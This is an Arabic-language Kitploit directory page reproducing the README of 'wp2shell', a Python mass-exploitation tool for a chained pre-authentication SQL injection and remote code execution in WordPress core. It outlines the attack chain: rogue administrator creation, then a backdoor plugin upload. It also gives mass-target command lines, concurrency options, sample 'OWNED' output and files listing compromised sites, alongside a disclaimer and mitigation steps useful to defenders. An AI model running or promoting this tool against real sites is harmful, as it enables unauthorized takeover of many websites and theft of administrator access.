Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-63030 — مستغل جماعي بلغة Python وكاشف لسلسلة RCE قبل المصادقة في نواة WordPress CVE-2026-63030 وCVE-2026-60137، تربط حقن SQL بالتنفيذ عن بُعد للتعليمات البرمجية. | Kitploit
أدوات/GitHubGitHub/fl0ydsec/cve-2026-63030
ماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHub
3منذ 17س 48دلم تتم المراجعة بعد
fl0ydsec/cve-2026-63030

CVE-2026-63030

مستغل جماعي بلغة Python وكاشف لسلسلة RCE قبل المصادقة في نواة WordPress CVE-2026-63030 وCVE-2026-60137، تربط حقن SQL بالتنفيذ عن بُعد للتعليمات البرمجية.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WP2Shell — CVE-2026-63030 + CVE-2026-60137

تنفيذ تعليمات برمجية عن بُعد (RCE) قبل المصادقة في نواة WordPress (استغلال جماعي / كاشف)

CVE-2026-63030 CVE-2026-60137 CVSS WordPress Auth

Author Python Telegram


📋 نظرة عامة على الثغرة

السمةالتفاصيل
معرّف CVECVE-2026-63030 (+ CVE-2026-60137)
السلسلةwp2shell — تنفيذ تعليمات برمجية عن بُعد قبل المصادقة
الخطورة🔴 حرجة (CVSS 9.8)
الهدفنواة WordPress (بدون إضافات)
المتأثر (RCE)6.9.0 – 6.9.4 و 7.0.0 – 7.0.1
المتأثر (SQLi فقط)6.8.0 – 6.8.5
تم الإصلاح6.8.6 / 6.9.5 / 7.0.2 (18/07/2026)
المصادقة المطلوبةلا شيء

🔍 الوصف التقني

ثغرتان متسلسلتان في نواة WordPress:

  1. CVE-2026-60137 — حقن SQL: حقن SQL في المعامل author__not_in الخاص بالفئة الداخلية WP_Query.
  2. CVE-2026-63030 — ارتباك مسار REST API batch: نقطة النهاية /wp-json/batch/v1 تُفقد تزامن مدخلات الدفعة، مما يجعل الطلب "يسقط" في المسار التالي.

تحوّل السلسلة حقن SQL إلى تنفيذ تعليمات برمجية عن بُعد قبل المصادقة:

root@kitploit:~
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
        │                                    │
        └──────────────┬─────────────────────┘
                       ▼
        UNION fake-post + oEmbed + changeset poisoning
                       ▼
        POST /wp/v2/users  (roles: administrator)  ← admin criado sem auth
                       ▼
        login → upload plugin backdoor → RCE

خيارات احتياطية: INTO OUTFILE مباشرة (صلاحية FILE) واستخراج أعمى للتجزئة + كسرها.


🚀 الاستخدام

root@kitploit:~
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote  -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
الخيارالوصف
-l, --targets-fileهدف واحد لكل سطر (قابل للتكرار، بلا حد)
-u, --targetهدف واحد
--cmdالأمر المراد تنفيذه على الهدف
--authorizedإلزامي (أو WP2SHELL_AUTHORIZED=1)
-c, --concurrencyالأهداف المتوازية (1–32)
--delaySLEEP للتوقيت/الاستخراج (2 = قوي)
--rateالطلبات/ثانية لكل هدف
-k, --insecureتجاهل TLS
--proxyوسيط HTTP
--wordlist / --password / --usernameخيار احتياطي لبيانات الاعتماد
--log / --owned / --results-csvملفات الإخراج

📊 الإخراج

root@kitploit:~
[+] [14:22:31] https://target.com  OWNED  ✓1 ~0 ✗10
[~] [14:22:32] https://other.com   ADMIN  ✓1 ~1 ✗10

---- SUMMARY ----
[+] owned=1   [~] admin=1   [-] fail=10   [.] error=0
  • owned.txt — الأهداف التي تم اختراقها (shell URL)
  • admins.txt — حسابات المدير المُنشأة دون تنفيذ RCE (بيانات الاعتماد)
  • exploit_log.txt — تفاصيل لكل هدف
  • results.csv — ملخص (exit_code: 0=owned, 4=admin, 2=fail, 3=error)

⚙️ الميزات

  • حقن SQL من نوع UNION داخلي + توقيت + أوراكل X-WP-Total
  • إنشاء مدير قبل المصادقة عبر oEmbed/changeset poisoning
  • تسجيل دخول مخفي (WPS Hide Login whl_page عبر SQLi) + مسارات شائعة
  • رفع إضافة مع nonce/تفعيل صحيحين + خيار احتياطي INTO OUTFILE
  • استغلال جماعي بلا حد، متوازٍ لكل هدف، مهلة زمنية مضادة للتعليق
  • owned/admins في الوقت الفعلي

📁 هيكل الملفات

root@kitploit:~
├── wp2shell.py       # exploit + detector
├── targets.txt       # alvos (uma URL por linha)
├── owned.txt         # RCE conseguido (auto-criado)
├── admins.txt        # admins criados (auto-criado)
└── README.md

⚠️ إخلاء المسؤولية

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ التخفيف

  1. قم بالترقية إلى 6.8.6 / 6.9.5 / 7.0.2 (أو أعلى)
  2. احظر طلبات POST غير المصادق عليها على /wp-json/batch/v1 و /?rest_route=/batch/v1
  3. دقّق في wp-content/uploads/ و wp-content/plugins/ بحثًا عن ملفات PHP مشبوهة

👤 المؤلف

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

تنزيل الأداة